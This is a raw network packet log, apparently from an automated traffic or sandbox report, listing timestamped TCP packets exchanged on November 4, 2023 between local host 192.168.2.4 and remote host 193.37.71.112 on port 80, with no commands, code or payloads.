                                                                                                                                                                                                                            Nov 4, 2023 01:35:16.566836119 CET8049731193.37.71.112192.168.2.4
                                                                                                                                                                                                                            Nov 4, 2023 01:35:16.566863060 CET4973180192.168.2.4193.37.71.112
                                                                                                                                                                                                                            Nov 4, 2023 01:35:16.566876888 CET4973180192.168.2.4193.37.71.112
                                                                                                                                                                                                                            Nov 4, 2023 01:35:16.566880941 CET8049731193.37.71.112192.168.2.4
                                                                                                                                                                                                                            Nov 4, 2023 01:35:16.566881895 CET4973180192.168.2.4193.37.71.112
                                                                                                                                                                                                                            Nov 4, 2023 01:35:16.566924095 CET4973180192.168.2.4193.37.71.112
                                                                                                                                                                                                                            Nov 4, 2023 01:35:16.567040920 CET4973180192.168.2.4193.37.71.112
                                                                                                                                                                                                                            Nov 4, 2023 01:35:16.567321062 CET8049731193.37.71.112192.168.2.4
                                                                                                                                                                                                                            Nov 4, 2023 01:35:16.567364931 CET4973180192.168.2.4193.37.71.112
                                                                                                                                                                                                                            Nov 4, 2023 01:35:16.567425966 CET8049731193.37.71.112192.168.2.4
                                                                                                                                                                                                                            Nov 4, 2023 01:35:16.567466021 CET4973180192.168.2.4193.37.71.112
                                                                                                                                                                                                                            Nov 4, 2023 01:35:16.568022966 CET8049731193.37.71.112192.168.2.4
                                                                                                                                                                                                                            Nov 4, 2023 01:35:16.568058968 CET4973180192.168.2.4193.37.71.112
                                                                                                                                                                                                                            Nov 4, 2023 01:35:16.568073034 CET4973180192.168.2.4193.37.71.112
                                                                                                                                                                                                                            Nov 4, 2023 01:35:16.568101883 CET4973180192.168.2.4193.37.71.112
                                                                                                                                                                                                                            Nov 4, 2023 01:35:16.568402052 CET8049731193.37.71.112192.168.2.4
                                                                                                                                                                                                                            Nov 4, 2023 01:35:16.568435907 CET4973180192.168.2.4193.37.71.112
                                                                                                                                                                                                                            Nov 4, 2023 01:35:16.568475008 CET8049731193.37.71.112192.168.2.4
                                                                                                                                                                                                                            Nov 4, 2023 01:35:16.568487883 CET4973180192.168.2.4193.37.71.112
                                                                                                                                                                                                                            Nov 4, 2023 01:35:16.568487883 CET4973180192.168.2.4193.37.71.112
                                                                                                                                                                                                                            Nov 4, 2023 01:35:16.568519115 CET4973180192.168.2.4193.37.71.112
                                                                                                                                                                                                                            Nov 4, 2023 01:35:16.568579912 CET4973180192.168.2.4193.37.71.112
                                                                                                                                                                                                                            Nov 4, 2023 01:35:16.568651915 CET8049731193.37.71.112192.168.2.4
                                                                                                                                                                                                                            Nov 4, 2023 01:35:16.568686962 CET8049731193.37.71.112192.168.2.4
                                                                                                                                                                                                                            Nov 4, 2023 01:35:16.568691969 CET4973180192.168.2.4193.37.71.112
                                                                                                                                                                                                                            Nov 4, 2023 01:35:16.568706989 CET4973180192.168.2.4193.37.71.112
                                                                                                                                                                                                                            Nov 4, 2023 01:35:16.568742037 CET4973180192.168.2.4193.37.71.112
                                                                                                                                                                                                                            Nov 4, 2023 01:35:16.569199085 CET8049731193.37.71.112192.168.2.4
                                                                                                                                                                                                                            Nov 4, 2023 01:35:16.569233894 CET4973180192.168.2.4193.37.71.112
                                                                                                                                                                                                                            Nov 4, 2023 01:35:16.569497108 CET4973180192.168.2.4193.37.71.112
                                                                                                                                                                                                                            Nov 4, 2023 01:35:16.570718050 CET8049731193.37.71.112192.168.2.4
                                                                                                                                                                                                                            Nov 4, 2023 01:35:16.570730925 CET8049731193.37.71.112192.168.2.4
                                                                                                                                                                                                                            Nov 4, 2023 01:35:16.570771933 CET4973180192.168.2.4193.37.71.112
                                                                                                                                                                                                                            Nov 4, 2023 01:35:16.571186066 CET4973180192.168.2.4193.37.71.112
                                                                                                                                                                                                                            Nov 4, 2023 01:35:16.572025061 CET8049731193.37.71.112192.168.2.4
                                                                                                                                                                                                                            Nov 4, 2023 01:35:16.572077036 CET4973180192.168.2.4193.37.71.112
                                                                                                                                                                                                                            Nov 4, 2023 01:35:16.572155952 CET4973180192.168.2.4193.37.71.112
                                                                                                                                                                                                                            Nov 4, 2023 01:35:16.573467016 CET8049731193.37.71.112192.168.2.4
                                                                                                                                                                                                                            Nov 4, 2023 01:35:16.573504925 CET4973180192.168.2.4193.37.71.112
                                                                                                                                                                                                                            Nov 4, 2023 01:35:16.573801994 CET4973180192.168.2.4193.37.71.112
                                                                                                                                                                                                                            Nov 4, 2023 01:35:16.577318907 CET8049731193.37.71.112192.168.2.4
                                                                                                                                                                                                                            Nov 4, 2023 01:35:16.577416897 CET4973180192.168.2.4193.37.71.112
                                                                                                                                                                                                                            Nov 4, 2023 01:35:16.577502012 CET4973180192.168.2.4193.37.71.112
                                                                                                                                                                                                                            Nov 4, 2023 01:35:16.577560902 CET4973180192.168.2.4193.37.71.112
                                                                                                                                                                                                                            Nov 4, 2023 01:35:16.577560902 CET4973180192.168.2.4193.37.71.112
                                                                                                                                                                                                                            Nov 4, 2023 01:35:16.582607031 CET8049731193.37.71.112192.168.2.4
                                                                                                                                                                                                                            Nov 4, 2023 01:35:16.582663059 CET4973180192.168.2.4193.37.71.112
                                                                                                                                                                                                                            Nov 4, 2023 01:35:16.647777081 CET8049731193.37.71.112192.168.2.4
                                                                                                                                                                                                                            Nov 4, 2023 01:35:16.647888899 CET4973180192.168.2.4193.37.71.112
                                                                                                                                                                                                                            Nov 4, 2023 01:35:16.786505938 CET8049731193.37.71.112192.168.2.4
                                                                                                                                                                                                                            Nov 4, 2023 01:35:16.786531925 CET8049731193.37.71.112192.168.2.4
                                                                                                                                                                                                                            Nov 4, 2023 01:35:16.786699057 CET4973180192.168.2.4193.37.71.112
                                                                                                                                                                                                                            Nov 4, 2023 01:35:16.786994934 CET8049731193.37.71.112192.168.2.4
                                                                                                                                                                                                                            Nov 4, 2023 01:35:16.787045002 CET4973180192.168.2.4193.37.71.112
                                                                                                                                                                                                                            Nov 4, 2023 01:35:16.787126064 CET8049731193.37.71.112192.168.2.4
                                                                                                                                                                                                                            Nov 4, 2023 01:35:16.787159920 CET4973180192.168.2.4193.37.71.112
                                                                                                                                                                                                                            Nov 4, 2023 01:35:16.787373066 CET8049731193.37.71.112192.168.2.4
                                                                                                                                                                                                                            Nov 4, 2023 01:35:16.787410975 CET4973180192.168.2.4193.37.71.112
                                                                                                                                                                                                                            Nov 4, 2023 01:35:16.787888050 CET8049731193.37.71.112192.168.2.4
                                                                                                                                                                                                                            Nov 4, 2023 01:35:16.787935019 CET4973180192.168.2.4193.37.71.112
                                                                                                                                                                                                                            Nov 4, 2023 01:35:16.787964106 CET8049731193.37.71.112192.168.2.4
                                                                                                                                                                                                                            Nov 4, 2023 01:35:16.788002968 CET4973180192.168.2.4193.37.71.112
                                                                                                                                                                                                                            Nov 4, 2023 01:35:16.788517952 CET8049731193.37.71.112192.168.2.4
                                                                                                                                                                                                                            Nov 4, 2023 01:35:16.788557053 CET4973180192.168.2.4193.37.71.112
                                                                                                                                                                                                                            Nov 4, 2023 01:35:16.788584948 CET8049731193.37.71.112192.168.2.4
                                                                                                                                                                                                                            Nov 4, 2023 01:35:16.788595915 CET8049731193.37.71.112192.168.2.4
                                                                                                                                                                                                                            Nov 4, 2023 01:35:16.788621902 CET4973180192.168.2.4193.37.71.112
                                                                                                                                                                                                                            Nov 4, 2023 01:35:16.788692951 CET8049731193.37.71.112192.168.2.4
                                                                                                                                                                                                                            Nov 4, 2023 01:35:16.788714886 CET4973180192.168.2.4193.37.71.112
                                                                                                                                                                                                                            Nov 4, 2023 01:35:16.788728952 CET4973180192.168.2.4193.37.71.112
                                                                                                                                                                                                                            Nov 4, 2023 01:35:16.788902998 CET8049731193.37.71.112192.168.2.4
                                                                                                                                                                                                                            Nov 4, 2023 01:35:16.788935900 CET4973180192.168.2.4193.37.71.112
                                                                                                                                                                                                                            Nov 4, 2023 01:35:16.789536953 CET8049731193.37.71.112192.168.2.4
                                                                                                                                                                                                                            Nov 4, 2023 01:35:16.789549112 CET8049731193.37.71.112192.168.2.4
                                                                                                                                                                                                                            Nov 4, 2023 01:35:16.789586067 CET4973180192.168.2.4193.37.71.112
                                                                                                                                                                                                                            Nov 4, 2023 01:35:16.789607048 CET4973180192.168.2.4193.37.71.112
                                                                                                                                                                                                                            Nov 4, 2023 01:35:16.790349007 CET8049731193.37.71.112192.168.2.4
                                                                                                                                                                                                                            Nov 4, 2023 01:35:16.790393114 CET4973180192.168.2.4193.37.71.112
                                                                                                                                                                                                                            Nov 4, 2023 01:35:16.791527987 CET8049731193.37.71.112192.168.2.4
                                                                                                                                                                                                                            Nov 4, 2023 01:35:16.791615963 CET4973180192.168.2.4193.37.71.112
                                                                                                                                                                                                                            Nov 4, 2023 01:35:16.791621923 CET8049731193.37.71.112192.168.2.4
                                                                                                                                                                                                                            Nov 4, 2023 01:35:16.791649103 CET8049731193.37.71.112192.168.2.4
                                                                                                                                                                                                                            Nov 4, 2023 01:35:16.791682005 CET4973180192.168.2.4193.37.71.112
                                                                                                                                                                                                                            Nov 4, 2023 01:35:16.792910099 CET4973180192.168.2.4193.37.71.112
                                                                                                                                                                                                                            Nov 4, 2023 01:35:16.793591976 CET8049731193.37.71.112192.168.2.4
                                                                                                                                                                                                                            Nov 4, 2023 01:35:16.793632984 CET4973180192.168.2.4193.37.71.112
                                                                                                                                                                                                                            Nov 4, 2023 01:35:16.794138908 CET8049731193.37.71.112192.168.2.4
                                                                                                                                                                                                                            Nov 4, 2023 01:35:16.794164896 CET8049731193.37.71.112192.168.2.4
                                                                                                                                                                                                                            Nov 4, 2023 01:35:16.794176102 CET4973180192.168.2.4193.37.71.112
                                                                                                                                                                                                                            Nov 4, 2023 01:35:16.794198036 CET4973180192.168.2.4193.37.71.112
                                                                                                                                                                                                                            Nov 4, 2023 01:35:16.794224024 CET8049731193.37.71.112192.168.2.4
                                                                                                                                                                                                                            Nov 4, 2023 01:35:16.794239998 CET8049731193.37.71.112192.168.2.4
                                                                                                                                                                                                                            Nov 4, 2023 01:35:16.794259071 CET4973180192.168.2.4193.37.71.112
                                                                                                                                                                                                                            Nov 4, 2023 01:35:16.794275999 CET4973180192.168.2.4193.37.71.112
                                                                                                                                                                                                                            Nov 4, 2023 01:35:16.797686100 CET8049731193.37.71.112192.168.2.4
                                                                                                                                                                                                                            Nov 4, 2023 01:35:16.797704935 CET8049731193.37.71.112192.168.2.4
                                                                                                                                                                                                                            Nov 4, 2023 01:35:16.797715902 CET8049731193.37.71.112192.168.2.4
                                                                                                                                                                                                                            Nov 4, 2023 01:35:16.797749996 CET4973180192.168.2.4193.37.71.112
                                                                                                                                                                                                                            Nov 4, 2023 01:35:16.798073053 CET8049731193.37.71.112192.168.2.4
                                                                                                                                                                                                                            Nov 4, 2023 01:35:16.798105955 CET4973180192.168.2.4193.37.71.112
                                                                                                                                                                                                                            Nov 4, 2023 01:35:16.798121929 CET4973180192.168.2.4193.37.71.112
                                                                                                                                                                                                                            Nov 4, 2023 01:35:16.798141956 CET8049731193.37.71.112192.168.2.4
                                                                                                                                                                                                                            Nov 4, 2023 01:35:16.798175097 CET4973180192.168.2.4193.37.71.112
                                                                                                                                                                                                                            Nov 4, 2023 01:35:16.798731089 CET8049731193.37.71.112192.168.2.4
                                                                                                                                                                                                                            Nov 4, 2023 01:35:16.798748016 CET8049731193.37.71.112192.168.2.4
                                                                                                                                                                                                                            Nov 4, 2023 01:35:16.798763990 CET4973180192.168.2.4193.37.71.112
                                                                                                                                                                                                                            Nov 4, 2023 01:35:16.798782110 CET4973180192.168.2.4193.37.71.112
                                                                                                                                                                                                                            Nov 4, 2023 01:35:16.799034119 CET8049731193.37.71.112192.168.2.4
                                                                                                                                                                                                                            Nov 4, 2023 01:35:16.799067020 CET4973180192.168.2.4193.37.71.112
                                                                                                                                                                                                                            Nov 4, 2023 01:35:16.799185038 CET8049731193.37.71.112192.168.2.4
                                                                                                                                                                                                                            Nov 4, 2023 01:35:16.799220085 CET4973180192.168.2.4193.37.71.112
                                                                                                                                                                                                                            Nov 4, 2023 01:35:16.799773932 CET8049731193.37.71.112192.168.2.4
                                                                                                                                                                                                                            Nov 4, 2023 01:35:16.799940109 CET4973180192.168.2.4193.37.71.112
                                                                                                                                                                                                                            Nov 4, 2023 01:35:16.799981117 CET8049731193.37.71.112192.168.2.4
                                                                                                                                                                                                                            Nov 4, 2023 01:35:16.800148010 CET4973180192.168.2.4193.37.71.112
                                                                                                                                                                                                                            Nov 4, 2023 01:35:16.800219059 CET4973180192.168.2.4193.37.71.112
                                                                                                                                                                                                                            Nov 4, 2023 01:35:16.800270081 CET4973180192.168.2.4193.37.71.112
                                                                                                                                                                                                                            Nov 4, 2023 01:35:16.800345898 CET4973180192.168.2.4193.37.71.112
                                                                                                                                                                                                                            Nov 4, 2023 01:35:16.800394058 CET4973180192.168.2.4193.37.71.112
                                                                                                                                                                                                                            Nov 4, 2023 01:35:16.800429106 CET4973180192.168.2.4193.37.71.112
                                                                                                                                                                                                                            Nov 4, 2023 01:35:16.802756071 CET8049731193.37.71.112192.168.2.4
                                                                                                                                                                                                                            Nov 4, 2023 01:35:16.802808046 CET4973180192.168.2.4193.37.71.112
                                                                                                                                                                                                                            Nov 4, 2023 01:35:16.868081093 CET8049731193.37.71.112192.168.2.4
                                                                                                                                                                                                                            Nov 4, 2023 01:35:16.868350983 CET4973180192.168.2.4193.37.71.112
                                                                                                                                                                                                                            Nov 4, 2023 01:35:17.006802082 CET8049731193.37.71.112192.168.2.4
                                                                                                                                                                                                                            Nov 4, 2023 01:35:17.006866932 CET8049731193.37.71.112192.168.2.4
                                                                                                                                                                                                                            Nov 4, 2023 01:35:17.007008076 CET4973180192.168.2.4193.37.71.112
                                                                                                                                                                                                                            Nov 4, 2023 01:35:17.007008076 CET4973180192.168.2.4193.37.71.112
                                                                                                                                                                                                                            Nov 4, 2023 01:35:17.007154942 CET8049731193.37.71.112192.168.2.4
                                                                                                                                                                                                                            Nov 4, 2023 01:35:17.007193089 CET4973180192.168.2.4193.37.71.112
                                                                                                                                                                                                                            Nov 4, 2023 01:35:17.007419109 CET8049731193.37.71.112192.168.2.4
                                                                                                                                                                                                                            Nov 4, 2023 01:35:17.007458925 CET4973180192.168.2.4193.37.71.112
                                                                                                                                                                                                                            Nov 4, 2023 01:35:17.007817030 CET8049731193.37.71.112192.168.2.4
                                                                                                                                                                                                                            Nov 4, 2023 01:35:17.007854939 CET4973180192.168.2.4193.37.71.112
                                                                                                                                                                                                                            Nov 4, 2023 01:35:17.008037090 CET8049731193.37.71.112192.168.2.4
                                                                                                                                                                                                                            Nov 4, 2023 01:35:17.008073092 CET4973180192.168.2.4193.37.71.112
                                                                                                                                                                                                                            Nov 4, 2023 01:35:17.008424044 CET8049731193.37.71.112192.168.2.4
                                                                                                                                                                                                                            Nov 4, 2023 01:35:17.008467913 CET4973180192.168.2.4193.37.71.112
                                                                                                                                                                                                                            Nov 4, 2023 01:35:17.008723021 CET8049731193.37.71.112192.168.2.4
                                                                                                                                                                                                                            Nov 4, 2023 01:35:17.008765936 CET4973180192.168.2.4193.37.71.112
                                                                                                                                                                                                                            Nov 4, 2023 01:35:17.008799076 CET8049731193.37.71.112192.168.2.4
                                                                                                                                                                                                                            Nov 4, 2023 01:35:17.008833885 CET4973180192.168.2.4193.37.71.112
                                                                                                                                                                                                                            Nov 4, 2023 01:35:17.008969069 CET8049731193.37.71.112192.168.2.4
                                                                                                                                                                                                                            Nov 4, 2023 01:35:17.009006023 CET4973180192.168.2.4193.37.71.112
                                                                                                                                                                                                                            Nov 4, 2023 01:35:17.009480000 CET8049731193.37.71.112192.168.2.4
                                                                                                                                                                                                                            Nov 4, 2023 01:35:17.009520054 CET4973180192.168.2.4193.37.71.112
                                                                                                                                                                                                                            Nov 4, 2023 01:35:17.009732008 CET8049731193.37.71.112192.168.2.4
                                                                                                                                                                                                                            Nov 4, 2023 01:35:17.009773970 CET4973180192.168.2.4193.37.71.112
                                                                                                                                                                                                                            Nov 4, 2023 01:35:17.010179043 CET8049731193.37.71.112192.168.2.4
                                                                                                                                                                                                                            Nov 4, 2023 01:35:17.010236979 CET4973180192.168.2.4193.37.71.112
                                                                                                                                                                                                                            Nov 4, 2023 01:35:17.011658907 CET8049731193.37.71.112192.168.2.4
                                                                                                                                                                                                                            Nov 4, 2023 01:35:17.011699915 CET4973180192.168.2.4193.37.71.112
                                                                                                                                                                                                                            Nov 4, 2023 01:35:17.011708975 CET8049731193.37.71.112192.168.2.4
                                                                                                                                                                                                                            Nov 4, 2023 01:35:17.011745930 CET4973180192.168.2.4193.37.71.112
                                                                                                                                                                                                                            Nov 4, 2023 01:35:17.012873888 CET8049731193.37.71.112192.168.2.4
                                                                                                                                                                                                                            Nov 4, 2023 01:35:17.012917042 CET4973180192.168.2.4193.37.71.112
                                                                                                                                                                                                                            Nov 4, 2023 01:35:17.013680935 CET8049731193.37.71.112192.168.2.4
                                                                                                                                                                                                                            Nov 4, 2023 01:35:17.013716936 CET4973180192.168.2.4193.37.71.112
                                                                                                                                                                                                                            Nov 4, 2023 01:35:17.014055014 CET8049731193.37.71.112192.168.2.4
                                                                                                                                                                                                                            Nov 4, 2023 01:35:17.014080048 CET8049731193.37.71.112192.168.2.4
                                                                                                                                                                                                                            Nov 4, 2023 01:35:17.014091015 CET4973180192.168.2.4193.37.71.112
                                                                                                                                                                                                                            Nov 4, 2023 01:35:17.014113903 CET4973180192.168.2.4193.37.71.112
                                                                                                                                                                                                                            Nov 4, 2023 01:35:17.014400959 CET8049731193.37.71.112192.168.2.4
                                                                                                                                                                                                                            Nov 4, 2023 01:35:17.014440060 CET4973180192.168.2.4193.37.71.112
                                                                                                                                                                                                                            Nov 4, 2023 01:35:17.017725945 CET8049731193.37.71.112192.168.2.4
                                                                                                                                                                                                                            Nov 4, 2023 01:35:17.017777920 CET4973180192.168.2.4193.37.71.112
                                                                                                                                                                                                                            Nov 4, 2023 01:35:17.017947912 CET8049731193.37.71.112192.168.2.4
                                                                                                                                                                                                                            Nov 4, 2023 01:35:17.017985106 CET4973180192.168.2.4193.37.71.112
                                                                                                                                                                                                                            Nov 4, 2023 01:35:17.018125057 CET8049731193.37.71.112192.168.2.4
                                                                                                                                                                                                                            Nov 4, 2023 01:35:17.018163919 CET4973180192.168.2.4193.37.71.112
                                                                                                                                                                                                                            Nov 4, 2023 01:35:17.018239975 CET8049731193.37.71.112192.168.2.4
                                                                                                                                                                                                                            Nov 4, 2023 01:35:17.018275976 CET4973180192.168.2.4193.37.71.112
                                                                                                                                                                                                                            Nov 4, 2023 01:35:17.020678043 CET8049731193.37.71.112192.168.2.4
                                                                                                                                                                                                                            Nov 4, 2023 01:35:17.020731926 CET4973180192.168.2.4193.37.71.112
                                                                                                                                                                                                                            Nov 4, 2023 01:35:17.021346092 CET8049731193.37.71.112192.168.2.4
                                                                                                                                                                                                                            Nov 4, 2023 01:35:17.021389961 CET4973180192.168.2.4193.37.71.112
                                                                                                                                                                                                                            Nov 4, 2023 01:35:17.023021936 CET8049731193.37.71.112192.168.2.4
                                                                                                                                                                                                                            Nov 4, 2023 01:35:17.023097038 CET4973180192.168.2.4193.37.71.112
                                                                                                                                                                                                                            Nov 4, 2023 01:35:17.024231911 CET8049731193.37.71.112192.168.2.4
                                                                                                                                                                                                                            Nov 4, 2023 01:35:17.024276018 CET4973180192.168.2.4193.37.71.112
                                                                                                                                                                                                                            Nov 4, 2023 01:35:17.024882078 CET8049731193.37.71.112192.168.2.4
                                                                                                                                                                                                                            Nov 4, 2023 01:35:17.024925947 CET4973180192.168.2.4193.37.71.112
                                                                                                                                                                                                                            Nov 4, 2023 01:35:17.025747061 CET8049731193.37.71.112192.168.2.4
                                                                                                                                                                                                                            Nov 4, 2023 01:35:17.025785923 CET4973180192.168.2.4193.37.71.112
                                                                                                                                                                                                                            Nov 4, 2023 01:35:17.025804043 CET8049731193.37.71.112192.168.2.4
                                                                                                                                                                                                                            Nov 4, 2023 01:35:17.025839090 CET4973180192.168.2.4193.37.71.112
                                                                                                                                                                                                                            Nov 4, 2023 01:35:17.026499987 CET8049731193.37.71.112192.168.2.4
                                                                                                                                                                                                                            Nov 4, 2023 01:35:17.026545048 CET4973180192.168.2.4193.37.71.112
                                                                                                                                                                                                                            Nov 4, 2023 01:35:17.026683092 CET8049731193.37.71.112192.168.2.4
                                                                                                                                                                                                                            Nov 4, 2023 01:35:17.026719093 CET4973180192.168.2.4193.37.71.112
                                                                                                                                                                                                                            Nov 4, 2023 01:35:17.026774883 CET8049731193.37.71.112192.168.2.4
                                                                                                                                                                                                                            Nov 4, 2023 01:35:17.026809931 CET4973180192.168.2.4193.37.71.112
                                                                                                                                                                                                                            Nov 4, 2023 01:35:17.027108908 CET8049731193.37.71.112192.168.2.4
                                                                                                                                                                                                                            Nov 4, 2023 01:35:17.027149916 CET4973180192.168.2.4193.37.71.112
                                                                                                                                                                                                                            Nov 4, 2023 01:35:17.027157068 CET8049731193.37.71.112192.168.2.4
                                                                                                                                                                                                                            Nov 4, 2023 01:35:17.027199984 CET4973180192.168.2.4193.37.71.112
                                                                                                                                                                                                                            Nov 4, 2023 01:35:17.027829885 CET8049731193.37.71.112192.168.2.4
                                                                                                                                                                                                                            Nov 4, 2023 01:35:17.027841091 CET8049731193.37.71.112192.168.2.4
                                                                                                                                                                                                                            Nov 4, 2023 01:35:17.027872086 CET4973180192.168.2.4193.37.71.112
                                                                                                                                                                                                                            Nov 4, 2023 01:35:17.027889013 CET4973180192.168.2.4193.37.71.112
                                                                                                                                                                                                                            Nov 4, 2023 01:35:17.027909994 CET8049731193.37.71.112192.168.2.4
                                                                                                                                                                                                                            Nov 4, 2023 01:35:17.027955055 CET4973180192.168.2.4193.37.71.112
                                                                                                                                                                                                                            Nov 4, 2023 01:35:17.027966022 CET8049731193.37.71.112192.168.2.4
                                                                                                                                                                                                                            Nov 4, 2023 01:35:17.028007030 CET4973180192.168.2.4193.37.71.112
                                                                                                                                                                                                                            Nov 4, 2023 01:35:17.054447889 CET8049731193.37.71.112192.168.2.4
                                                                                                                                                                                                                            Nov 4, 2023 01:35:17.054471970 CET8049731193.37.71.112192.168.2.4
                                                                                                                                                                                                                            Nov 4, 2023 01:35:17.054482937 CET8049731193.37.71.112192.168.2.4
                                                                                                                                                                                                                            Nov 4, 2023 01:35:17.054488897 CET8049731193.37.71.112192.168.2.4
                                                                                                                                                                                                                            Nov 4, 2023 01:35:17.054500103 CET8049731193.37.71.112192.168.2.4
                                                                                                                                                                                                                            Nov 4, 2023 01:35:17.054548979 CET8049731193.37.71.112192.168.2.4
                                                                                                                                                                                                                            Nov 4, 2023 01:35:17.054595947 CET8049731193.37.71.112192.168.2.4
                                                                                                                                                                                                                            Nov 4, 2023 01:35:17.054630041 CET4973180192.168.2.4193.37.71.112
                                                                                                                                                                                                                            Nov 4, 2023 01:35:17.054670095 CET8049731193.37.71.112192.168.2.4
                                                                                                                                                                                                                            Nov 4, 2023 01:35:17.054677963 CET4973180192.168.2.4193.37.71.112
                                                                                                                                                                                                                            Nov 4, 2023 01:35:17.054718018 CET4973180192.168.2.4193.37.71.112
                                                                                                                                                                                                                            Nov 4, 2023 01:35:17.054727077 CET8049731193.37.71.112192.168.2.4
                                                                                                                                                                                                                            Nov 4, 2023 01:35:17.054737091 CET8049731193.37.71.112192.168.2.4
                                                                                                                                                                                                                            Nov 4, 2023 01:35:17.054745913 CET8049731193.37.71.112192.168.2.4
                                                                                                                                                                                                                            Nov 4, 2023 01:35:17.054771900 CET4973180192.168.2.4193.37.71.112
                                                                                                                                                                                                                            Nov 4, 2023 01:35:17.054789066 CET4973180192.168.2.4193.37.71.112
                                                                                                                                                                                                                            Nov 4, 2023 01:35:17.054821014 CET8049731193.37.71.112192.168.2.4
                                                                                                                                                                                                                            Nov 4, 2023 01:35:17.054857016 CET8049731193.37.71.112192.168.2.4
                                                                                                                                                                                                                            Nov 4, 2023 01:35:17.054866076 CET4973180192.168.2.4193.37.71.112
                                                                                                                                                                                                                            Nov 4, 2023 01:35:17.054867983 CET8049731193.37.71.112192.168.2.4
                                                                                                                                                                                                                            Nov 4, 2023 01:35:17.054904938 CET8049731193.37.71.112192.168.2.4
                                                                                                                                                                                                                            Nov 4, 2023 01:35:17.054912090 CET4973180192.168.2.4193.37.71.112
                                                                                                                                                                                                                            Nov 4, 2023 01:35:17.054939985 CET8049731193.37.71.112192.168.2.4
                                                                                                                                                                                                                            Nov 4, 2023 01:35:17.054945946 CET4973180192.168.2.4193.37.71.112
                                                                                                                                                                                                                            Nov 4, 2023 01:35:17.054963112 CET8049731193.37.71.112192.168.2.4
                                                                                                                                                                                                                            Nov 4, 2023 01:35:17.054986000 CET4973180192.168.2.4193.37.71.112
                                                                                                                                                                                                                            Nov 4, 2023 01:35:17.054996967 CET4973180192.168.2.4193.37.71.112
                                                                                                                                                                                                                            Nov 4, 2023 01:35:17.055011034 CET8049731193.37.71.112192.168.2.4
                                                                                                                                                                                                                            Nov 4, 2023 01:35:17.055051088 CET4973180192.168.2.4193.37.71.112
                                                                                                                                                                                                                            Nov 4, 2023 01:35:17.092974901 CET8049731193.37.71.112192.168.2.4
                                                                                                                                                                                                                            Nov 4, 2023 01:35:17.093173027 CET4973180192.168.2.4193.37.71.112
                                                                                                                                                                                                                            Nov 4, 2023 01:35:17.227068901 CET8049731193.37.71.112192.168.2.4
                                                                                                                                                                                                                            Nov 4, 2023 01:35:17.227087021 CET8049731193.37.71.112192.168.2.4
                                                                                                                                                                                                                            Nov 4, 2023 01:35:17.227096081 CET8049731193.37.71.112192.168.2.4
                                                                                                                                                                                                                            Nov 4, 2023 01:35:17.227225065 CET4973180192.168.2.4193.37.71.112
                                                                                                                                                                                                                            Nov 4, 2023 01:35:17.227565050 CET4973180192.168.2.4193.37.71.112
                                                                                                                                                                                                                            Nov 4, 2023 01:35:17.228260994 CET8049731193.37.71.112192.168.2.4
                                                                                                                                                                                                                            Nov 4, 2023 01:35:17.228308916 CET4973180192.168.2.4193.37.71.112
                                                                                                                                                                                                                            Nov 4, 2023 01:35:17.228545904 CET4973180192.168.2.4193.37.71.112
                                                                                                                                                                                                                            Nov 4, 2023 01:35:17.229398966 CET8049731193.37.71.112192.168.2.4
                                                                                                                                                                                                                            Nov 4, 2023 01:35:17.229448080 CET4973180192.168.2.4193.37.71.112
                                                                                                                                                                                                                            Nov 4, 2023 01:35:17.229507923 CET4973180192.168.2.4193.37.71.112
                                                                                                                                                                                                                            Nov 4, 2023 01:35:17.230688095 CET8049731193.37.71.112192.168.2.4
                                                                                                                                                                                                                            Nov 4, 2023 01:35:17.230742931 CET4973180192.168.2.4193.37.71.112
                                                                                                                                                                                                                            Nov 4, 2023 01:35:17.232640028 CET8049731193.37.71.112192.168.2.4
                                                                                                                                                                                                                            Nov 4, 2023 01:35:17.232696056 CET4973180192.168.2.4193.37.71.112
                                                                                                                                                                                                                            Nov 4, 2023 01:35:17.233866930 CET8049731193.37.71.112192.168.2.4
                                                                                                                                                                                                                            Nov 4, 2023 01:35:17.233917952 CET4973180192.168.2.4193.37.71.112
                                                                                                                                                                                                                            Nov 4, 2023 01:35:17.235012054 CET8049731193.37.71.112192.168.2.4
                                                                                                                                                                                                                            Nov 4, 2023 01:35:17.235059977 CET4973180192.168.2.4193.37.71.112
                                                                                                                                                                                                                            Nov 4, 2023 01:35:17.236814022 CET4973180192.168.2.4193.37.71.112
                                                                                                                                                                                                                            Nov 4, 2023 01:35:17.238945007 CET8049731193.37.71.112192.168.2.4
                                                                                                                                                                                                                            Nov 4, 2023 01:35:17.238996029 CET4973180192.168.2.4193.37.71.112
                                                                                                                                                                                                                            Nov 4, 2023 01:35:17.239120960 CET4973180192.168.2.4193.37.71.112
                                                                                                                                                                                                                            Nov 4, 2023 01:35:17.242044926 CET8049731193.37.71.112192.168.2.4
                                                                                                                                                                                                                            Nov 4, 2023 01:35:17.242093086 CET4973180192.168.2.4193.37.71.112
                                                                                                                                                                                                                            Nov 4, 2023 01:35:17.242218971 CET4973180192.168.2.4193.37.71.112
                                                                                                                                                                                                                            Nov 4, 2023 01:35:17.244205952 CET8049731193.37.71.112192.168.2.4
                                                                                                                                                                                                                            Nov 4, 2023 01:35:17.244432926 CET4973180192.168.2.4193.37.71.112
                                                                                                                                                                                                                            Nov 4, 2023 01:35:17.245273113 CET8049731193.37.71.112192.168.2.4
                                                                                                                                                                                                                            Nov 4, 2023 01:35:17.245354891 CET4973180192.168.2.4193.37.71.112
                                                                                                                                                                                                                            Nov 4, 2023 01:35:17.245780945 CET4973180192.168.2.4193.37.71.112
                                                                                                                                                                                                                            Nov 4, 2023 01:35:17.246442080 CET8049731193.37.71.112192.168.2.4
                                                                                                                                                                                                                            Nov 4, 2023 01:35:17.246500015 CET4973180192.168.2.4193.37.71.112
                                                                                                                                                                                                                            Nov 4, 2023 01:35:17.246551037 CET4973180192.168.2.4193.37.71.112
                                                                                                                                                                                                                            Nov 4, 2023 01:35:17.247596025 CET8049731193.37.71.112192.168.2.4
                                                                                                                                                                                                                            Nov 4, 2023 01:35:17.247662067 CET4973180192.168.2.4193.37.71.112
                                                                                                                                                                                                                            Nov 4, 2023 01:35:17.248692989 CET8049731193.37.71.112192.168.2.4
                                                                                                                                                                                                                            Nov 4, 2023 01:35:17.248739004 CET4973180192.168.2.4193.37.71.112
                                                                                                                                                                                                                            Nov 4, 2023 01:35:17.248759985 CET4973180192.168.2.4193.37.71.112
                                                                                                                                                                                                                            Nov 4, 2023 01:35:17.248883009 CET4973180192.168.2.4193.37.71.112
                                                                                                                                                                                                                            Nov 4, 2023 01:35:17.249917984 CET8049731193.37.71.112192.168.2.4
                                                                                                                                                                                                                            Nov 4, 2023 01:35:17.249974012 CET4973180192.168.2.4193.37.71.112
